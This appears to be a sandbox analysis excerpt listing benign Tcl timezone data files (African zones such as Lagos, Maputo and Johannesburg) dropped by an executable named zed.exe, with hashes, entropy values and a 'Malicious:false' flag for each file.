                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/El_Aaiun) {.. {-9223372036854775808 -3168 0 LMT}.. {-1136070432 -3600 0 -01}.. {198291600 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {1373162400 0 0 +00}.. {1376100000 3600 1 +00}.. {1382839200 0 0 +00}.. {1396144800 3600 1 +00}.. {1403920800 0 0 +00}.. {1406944800 3600 1 +00}.. {1414288800 0 0 +00}.. {1427594400 3600 1 +00}.. {1434247200 0 0 +00}.. {1437271200 3600 1 +00}.. {1445738400 0 0 +00}.. {1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.866631090752554
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcu5sp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dk4DBS
                                                                                                                                                                                                                                            MD5:6C115220CF951FC2EE3C299F86935B6D
                                                                                                                                                                                                                                            SHA1:A1CAB8C710BF20553AF45343118C1726CFE922B7
                                                                                                                                                                                                                                            SHA-256:BC53A4D489F48F14C594C4B0E52079B34E043A5751BBC7DF254A560352243575
                                                                                                                                                                                                                                            SHA-512:E87A4FD145B645DF034182CAD7F9D2BE5B2D9F3A17B6A9B6C84A0B3E846D92EC4C69DF2E85129B7A1AFBC0CCAAC8E3B1D47EB09F0900A82B908E9F6BF63B9736
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.899477454245453
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcHK0o/4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAV+4Dt
                                                                                                                                                                                                                                            MD5:07222D8ED83CDC456B4D5D84C4BDE320
                                                                                                                                                                                                                                            SHA1:2C657F461FA3F48D56C791AFE4AB7D2EAF45AF60
                                                                                                                                                                                                                                            SHA-256:653AF88955C4418D973E2F8681A99552EB7BE95BCA64C736072F488462F7B373
                                                                                                                                                                                                                                            SHA-512:3016D0636F401BD88BCD460F6A61782E7E8A2C32CE4ECB904C711DF414038A5818F0CA3D7FC671C5ABCE70647FC674A2EF9081C5289EBFD184B44885902E007A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.884642061266759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc0B5h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2Dlfh4Dt
                                                                                                                                                                                                                                            MD5:8666DABE8D196ACD94A9691C592FAF4E
                                                                                                                                                                                                                                            SHA1:9F7EE009DCEAACA79C6EAA6FC73015D595467919
                                                                                                                                                                                                                                            SHA-256:06B82C524585192E0E8FC69DCC1CF86183A8C5EF404645DC413FCF3F8C16B0AB
                                                                                                                                                                                                                                            SHA-512:AAA32FD1B01BFECDD0D1C9C1DF1163374DAFE094C75720EA4095C34F7EAE7DCB594D1A7F6A2A90FB43FF01020F7AEB48E92496E0EE2D039AF23076CD369DD2A7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Harare) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):309
                                                                                                                                                                                                                                            Entropy (8bit):4.695542624694403
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2DWbzDm2OHePoHvmmXsd//HF2d7d6VcF2d6KsYov:MB862DW7mdHePCvmmcZvF0cVcF/KsFv
                                                                                                                                                                                                                                            MD5:F0E153FC9B978E30742ABC025CA45E02
                                                                                                                                                                                                                                            SHA1:73D96F3188190DAC2453E6F18A1C683CECB9CDE3
                                                                                                                                                                                                                                            SHA-256:5EEF6475E1312051037FCAE3354E32DC0910BE7A5116B71F8CCBE1CCA08D3F1C
                                                                                                                                                                                                                                            SHA-512:E66F4B5FF18BAAD53AFB1ED36A0827115C793075A61F794F26F32BC9F6799DF816A1F817BEB0C0BC938F89E6F5BFBE1AB4F504F1AF518764103FB287746552C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Johannesburg) {.. {-9223372036854775808 6720 0 LMT}.. {-2458173120 5400 0 SAST}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {-829526400 10800 1 SAST}.. {-813805200 7200 0 SAST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1127
                                                                                                                                                                                                                                            Entropy (8bit):4.027824722230131
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5mesdOkMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8M5:5YMV04MSHMzNxMbwM0JXMfCsMzaMq0QJ
                                                                                                                                                                                                                                            MD5:32EC0589260D9D4BCC85FE91E6F04D00
                                                                                                                                                                                                                                            SHA1:BAA269852C4AC6B89EA7941E7A75A007E0CF9EDF
                                                                                                                                                                                                                                            SHA-256:F2646E15488ABF2E960759CEFE5705416E71DA71BB8407B26196244FD1A3394F
                                                                                                                                                                                                                                            SHA-512:4F485453BE1D186ADBE0908852475C63C57BA498091C222EFFB9A5FEA2DB7F55E1BB2DBDBF6AC0F24CC67D47549FA3F5257655B5449B1BCF1FB5CDB27B03D501
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Juba) {.. {-9223372036854775808 7588 0 LMT}.. {-1230775588 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.837466713772859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcJEl2DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DIEl2V
                                                                                                                                                                                                                                            MD5:E929ED1BC316C71AABE7E625BD562FB1
                                                                                                                                                                                                                                            SHA1:C20C172518C02D93327F4BBBC5D410BFFEF5039D
                                                                                                                                                                                                                                            SHA-256:8EA3028CE2B025F0C457DC8F7601279CA5AF565A88B9FE80208F9F1030F2B0D0
                                                                                                                                                                                                                                            SHA-512:B2FBCF06EACCF18DE97AF1D6BC57D9638E0A36DBF17044FF97F6B9E5089CF9E13E1304F304495324C0ACC1128A7D2D494E7C1FDB95DB0855FCE54F7028096C50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1131
                                                                                                                                                                                                                                            Entropy (8bit):4.0421745451318385
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5xe9dSXMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8MM:5hMV04MSHMzNxMbwM0JXMfCsMzaMq0Qc
                                                                                                                                                                                                                                            MD5:2BD3850DDBE2F05BF6F24F3AEFF7516C
                                                                                                                                                                                                                                            SHA1:22B0DBB54E071F30D51A8654CF103F99537F74CD
                                                                                                                                                                                                                                            SHA-256:F475DB8A857A46B310B12C21D6A9BC6CA9FF2960DA429A9D57FA375F9439E13B
                                                                                                                                                                                                                                            SHA-512:1CF82FC07348C697F26625673DA7E3D734358B3FBE69D8E2132CAC0D9F00C7E8CDC353676CD9BAC4CBB9E26CF6638CEAE41DF559E7445D9C453409D7115FFC6C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Khartoum) {.. {-9223372036854775808 7808 0 LMT}.. {-1230775808 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.910322325134086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcCJRx+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DRX+DEi
                                                                                                                                                                                                                                            MD5:3017253E1C6ACCA8D470A014E4BB321D
                                                                                                                                                                                                                                            SHA1:671B7AC04580B56E2C34F88D123E8296947DDD7E
                                                                                                                                                                                                                                            SHA-256:73FEB807006897B4B485CB82394867444E890265EFE960EC66D6C0E325DA9372
                                                                                                                                                                                                                                            SHA-512:2498C380D761A16C183D78BC1BB18B1D2A1BFCB9C703D86A3FC04CCCE43D88C8D4BC3C47CC31639B78A5FE9C8A7445E9DBB52062E2F3B737DA1E7D0FF70F140A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Kigali) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                                            MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                                            SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                                            SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                                            SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):235
                                                                                                                                                                                                                                            Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                                            MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                                            SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                                            SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                                            SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                                            MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                                            SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                                            SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                                            SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                                            MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                                            SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                                            SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                                            SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                                            MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                                            SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                                            SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                                            SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                                            MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                                            SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                                            SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                                            SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                                            MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                                            SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                                            SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
                                                                                                                                                                                                                                            SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                                            MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                                            SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                                            SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                                            SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):149
                                                                                                                                                                                                                                            Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                                            MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                                            SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                                            SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                                            SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                                            MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                                            SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                                            SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                                            SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                                            MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                                            SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                                            SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                                            SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.877126792757121
